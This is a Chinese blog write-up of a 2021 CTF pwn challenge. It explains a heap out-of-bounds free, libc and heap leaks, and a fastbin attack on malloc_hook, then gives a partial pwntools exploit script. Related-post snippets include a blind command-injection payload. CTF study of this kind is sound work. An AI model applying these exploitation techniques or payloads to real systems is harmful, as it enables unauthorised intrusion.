2021 DASCTF X BUUOJ 五月大联动WP

最新推荐文章于 2022-05-23 22:55:58 发布
最新推荐文章于 2022-05-23 22:55:58 发布
阅读量1.6k 收藏 4
点赞数 5
分类专栏: 网络安全 ctf pwn 文章标签: 网络安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A951860555/article/details/117396327
版权

DASCTF X BUUOJ 五月大联动WP

概述

  这个五月我又参加了一次不留痕迹的ctf比赛,之所以叫不留痕迹,是因为总是拿不到好的名次😏,比赛结束前1小时还能苟进前10,不过后面还是被反超了。不好在安慰自己,新手嘛,刚刚上路,稳扎稳打,持续努力,定有收获。
  这个比赛完整环境可以在buuoj上找到,简单分析一下题目分布情况,pwn 2道,re 2道,web 2道,crypto 3道,misc 7道。我本人主要是专攻二进制方向,下面给出的是pwn和re的wp。

pwn

DASCTF_X_BUUOJ_2021_ticket

  购票程序,linux64位程序,使用libc-2.23.so,增删查改一应俱全,程序本身没有开启pie保护,其余保护全开,按理说这道题应该比第二道pwn要简单些的,但实际利用过程中由于存在很多限制,使得花费的时间比第二道pwn题还要久。
  如下截图所示,是该题目存在的两个漏洞,均位于删除逻辑功能里面,首先是idx没有判断小于0的情况,存在数组越界;其次是free时只是将idx+10处也就是记录堆大小的内存置空,而记录堆指针的内存idx+4没有置空。

free
  对于本题的利用思路,先利用unsorted bin泄露libc地址,然后利用前面提到的堆指针数组越界释放题目预先分配的两块内存,注意这里需要满足chunk size不为空的条件,释放后构成fast bin链,利用功能6泄露出heap地址。在得到堆地址和libc地址后,接下来就是如何控制程序流来获取shell,我的思路是先申请0x60大小的堆块,然后利用题目给的功能5修改age变量为这里的堆块指针,因为age变量恰好位于堆指针-3的位置。之后释放位于-3处的堆指针,再编辑该堆块的fd指针指向malloc_hook-0x23,最后就是正常的fastbin attack,将堆块分配到malloc_hook附近,修改malloc_hook为one_gadget。完整exp见下面的代码:

from pwn import *


libc_path = "./libc-2.23.so"
p = remote("node3.buuoj.cn", 26740)

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
shell = lambda : p.interactive()


def new(idx, size):
    sa(">> ", "1")
    sa("Index: \n", str(idx))
    sa("Remarks size: \n", str(size))

def free(idx):
    sa(">> ", "2")
    sa("Index: \n", str(idx))

def edit(idx, con):
    sa(">> ", "3")
    sa("Index: \n", str(idx))
    sa("Your remarks: \n", con)

def show(idx):
    sa(">> ", "4")
    sa("Index: \n", str(idx))

def edit_info(name, say, age):
    sa
最低0.47元/天 解锁文章
__lifanxin
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
【CTF大赛】2021 DASCTF July cybercms 一探再探
hhhhhggghbhh的博客
12-06 702
在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercms 的 web 题目。预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。这篇就来记录一下做这道题时候的心路历程吧……[
2021最新全国省市县区三级联动数据库表
02-22
2021最新全国省市县区三级联动数据库表, 2021年最新爬取的淘宝收货地址(菜鸟4级网络),网络上最新最全的省市县对应表
5月DASCTF
doudoudedi
05-24 1244
帮帮小红吧 命令盲注是我没有想到的 cat /flag |grep 'BJD{' || sleep(3); 密码bbcrypto 题目 # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill
WPDASCTF2021
車鈊的博客
06-06 830
补发WP ez_serialize 源码 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer"; e
MAR & DASCTF 2021
Je3Z的博客
04-06 523
ez_serialize 考察反序列化原生类 类 描述 DirectoryIterator 遍历目录 FilesystemIterator 遍历目录 GlobIterator 遍历目录,但是不同的点在于它可以通配例如/var/html/www/flag* SplFileObject 读取文件,按行读取,多行需要遍历 finfo/finfo_open() 需要两个参数 感觉比较好用的就FilesystemIterator和GlobIterator 其他感觉没啥用。。。。 题目 <?php erro
2020五月DASCTF
cwr1499640048的博客
07-01 984
bbcrypto # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = 'flag{**
浮动下单助手通达信或大智慧联动到同花顺xiadan.zip
06-27
目标用户群:习惯用通达信看盘,或习惯用大智慧看盘,但又喜欢用同花顺单独交易程序(xiadan.exe)来交易。 配置方式:打开压缩包中的配置文件,配置 "下单程序"的路径属性,即将path后面的路径改成你本机xiadan.exe...
2021省市区三级联动SQL表.zip
05-05
2021省市区三级联动SQL表 110000 北京 1 0 110100 北京市 2 110000 110101 东城区 3 110100 110102 西城区 3 110100 110105 朝阳区 3 110100 110106 丰台区 3 110100 110107 石景山区 3 110100 110108 海淀区 3 ...
jQuery带缩略图和大图联动切换代码
04-27
jQuery带缩略图和大图联动切换代码 jQuery带缩略图和大图联动切换代码
2021年国家统计局网站省市区三级联动
05-26
2021年从国家统计局数据 对于教程 方案一 https://blog.csdn.net/tangcv/article/details/117288987
DASCTF X BUU DASCTF2021 misc all WP
mumuzi的博客
05-29 3243
去******的猜******????****** MISC WP 签到: flag{welcome_to_dasctf_may} Holmes: 文件尾有rar,分离出来发现加了密,然鹅图片上面又有跳舞小人 对应解码,得到密码 YOUAREHOLMES 得到一个flag.py flag="flag{********************************}" encflag=[] for i in range(len(flag)): encflag.append((ord(fla
DASCTF2021—MISC赛后复现
Sapphire037的博客
04-04 1855
DASCTF—MISC赛后复现 1.简单的png隐写 下载得到一张flag.jpg 和hint.png,把png拖进tweakpng中查看,数据块有点问题,好像有两张图在里面(多谢八神的misc入门题) ,然后删掉前四个IDAT块保存得到另一张图 根据图中内容,用outguess解,89504E应该是密码 root:~/桌面/outguess-master# outguess -k "89504E" -r flag.jpg h1.txt Reading flag.jpg.... Extracting usa
2022DASCTF MAY Power cookie
a1563361185的博客
05-22 411
进入题目场景 如图所示 点击login by guest 得到如图所示 显示游客不可用,再由题目的给出的提示可以知道,只有管理员有资格访问 按F12进入控制台,输入document.cookie查看cookie,得到 (这里本来应当是空格,但我自己写过了所以只改回了0,效果一样的) 输入document.cookie="admin=1".得到管理员 接着刷新界面 得到flag ...
2020年DASCTF五月线上赛-ViQinere
hhcjl的博客
05-25 712
2020年DASCTF五月线上赛-ViQinere 2020年DASCTF五月线上赛-ViQinere 下载后IDA打开: 主函数 加密函数 程序逻辑为读取./flag中的字符串进行加密处理,然后输出。 在程序目录下建立flag文件测试。文件中写入abcdefg123,运行程序得到加密字符串gyewimg123 将加密的字符串再写入flag文件运行,得到abcdefg123。发现加解密为同一算法 nc连接远程服务器获取加密后的字符串。 > ncat 183.129.189.60 10087
2022DASCTF MAY 出题人挑战赛web部分
m0_62422842的博客
05-23 433
前言 这是五月buu的比赛,当时专心备考,所以没有怎么看,这次就来复现一下比赛中的一些web题吧。 Power Cookie 题目中提到了cookie,那肯定与cookie有关。题目中的信息没有给太多,那就bp抓包看看吧。 抓包分析看出set-cookie中admin为0 什么是set-Cookie?它向客户端发送一个http的cookie。cookie是由服务器发送给游览器的变量。上面是admin=0,我们需要管理员登录则就要admin=1。那这题就明显了。直接改包添加cookie就行了呀
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 818
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
GKCTF2021DASCTF应急挑战杯 部分WP
Le1a's Blog
06-27 983
Misc 你知道apng吗 下载附件得到girl.apng,用apngdis_gui分解得到每一帧的png图片 分别在2,18,26发现二维码。其中18,26可以直接扫描得到-ad20和-0327-288a235370ea}。图片2是扭曲的二维码,但可以用ps拖正 扫描得到flag{a3c7e4e5,最后在第十张图片的红色通道1中得到二维码 扫描得到-9b9d,所以flag为 flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea} 银杏岛の奇妙冒险 下载附件,打开exe,
DASCTF 四月赛 web部分
weixin_43610673的博客
04-25 2153
Ezunserialize 反序列化POP链、字符逃逸 POP链构造起来不难,字符逃逸参考:https://xz.aliyun.com/t/6588 https://blog.csdn.net/assasin0308/article/details/103711024 打开送源码 POP链构造: __toString() //把类当作字符串使用时触发,返回值需要为字符串 B类的__destru...
移动端ecahrts自定义X轴底部样式滑块联动
最新发布
07-08
对于移动端 Echarts 自定义 X 轴底部样式滑块联动的需求,你可以通过以下步骤实现: 1. 首先,在 Echarts 的配置项中设置 x 轴的类型为 "category",并自定义 x 轴的底部样式。例如: ```javascript option = { xAxis: { type: 'category', boundaryGap: false, axisTick: { show: false }, axisLabel: { show: false }, axisLine: { show: false }, data: ['A', 'B', 'C', 'D', 'E'] // 自定义 x 轴的底部样式 }, // 其他配置项... }; ``` 2. 接下来,你可以使用移动端的滑块组件(例如 swiper)来实现滑块联动。监听滑块的切换事件,根据当前滑块的索引值来更新 Echarts 图表的数据和显示内容。例如: ```javascript var mySwiper = new Swiper('.swiper-container', { on: { slideChange: function () { var currentIndex = this.activeIndex; // 获取当前滑块的索引值 // 根据当前索引值更新 Echarts 图表的数据和显示内容 option.xAxis.data = ['A', 'B', 'C', 'D', 'E']; // 更新 Echarts 图表 myChart.setOption(option); } } }); ``` 这样,当你在移动端滑动滑块时,Echarts 图表的 x 轴底部样式会联动更新。 需要注意的是,以上代码只是一个示例,具体的实现方式可能会根据你的具体需求和使用的滑块组件而有所不同。你可以根据自己的情况进行相应的调整和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值